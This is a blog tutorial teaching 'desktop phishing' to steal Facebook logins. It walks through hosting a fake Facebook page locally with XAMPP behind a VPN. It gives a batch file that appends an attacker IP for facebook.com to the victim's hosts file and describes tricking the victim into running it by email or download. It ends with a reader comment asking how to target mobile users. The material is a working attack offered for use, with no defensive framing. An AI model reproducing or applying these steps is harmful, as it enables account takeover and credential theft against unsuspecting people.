Pages

Sunday, 6 April 2014

Desktop Phishing - New art of phishing!!


Introduction:
In my last tutorial on hacking facebook accounts via phishing many users complaint that they were facing problem while dealing with hosting websites i-e they were getting banned.So I decided to write an article on desktop phishing which is a sophisticated trick to avoid hostings sites.It is a bit advance way of phishing so before this I would recommend you to go through my previous post on hacking facebook via phishing.
Click here.

What is desktop phishing?
It is a type of phishing attack in which you would not have to host your phishing files on any free hosting sites instead your computer or lapotop would act as a server.In desktop phishing the attacker exploits the host file.Hos file is basically a text file in which domains are mapped to their ip addresses. A hosts file basically controls how your browser finds websites. For example :

74.125.236.84  www.facebook.com

We have used this ip address to map facebook.com(domain).It will work in a way that now whenever user would type www.facebook.com instead of approaching facebook he would be redirected to the website that is adjacent to this particular IP(74.125.236.84 ) and this ip is of google.com.
So by using this concept the attacker or hacker will try to change or modify the host file of the victim in this way.

Prerequisite:

1. Phisher Page - You can download Facebook Phisher page from Here

2. Web server - You can use wamp or xammp , I would recommend you to use xammp.

3. A static VPN - I will Use proXPN VPN for this Tutorial but I recommend you to use Strong Open VPN as it is very stable.


Procedure:-

1. First Download and install Xampp on your PC, Start Apache and Msql services.




2. Download the Facebook Phisher page From the link given above, Place all its contents in the htdocs folder and if there are some files already in that folder then delete them all.You will find htdocs under Xammp (C:\xampp\htdocs).Like this:




3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn).




4. Now we have to replace some text in the victims Host file which is at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job.

5. Open up notepad then paste the following code over there:

@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

Replace "172.X.XX.X.X" with your IP (vpn ) address,and then finally save it as Save it as Something.bat.

6.Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com.

Result:

  • Now when the victim will access facebook,com instead of landing on facebook he would be redirected to our facebook phisheing page and after imputing his credential just like phishing his account would get compromised.Check out the proves right below:





  • You will receive all his credentials in the log file placed in htdocs folder:




Conclusion:
If you have any query regarding this post then do mention it in the comments below will try to sort it out.
Take care see you next time.

1 comment:

  1. does it work for mobile device ? how to hack mobile user ?? and it work in wan ??

    ReplyDelete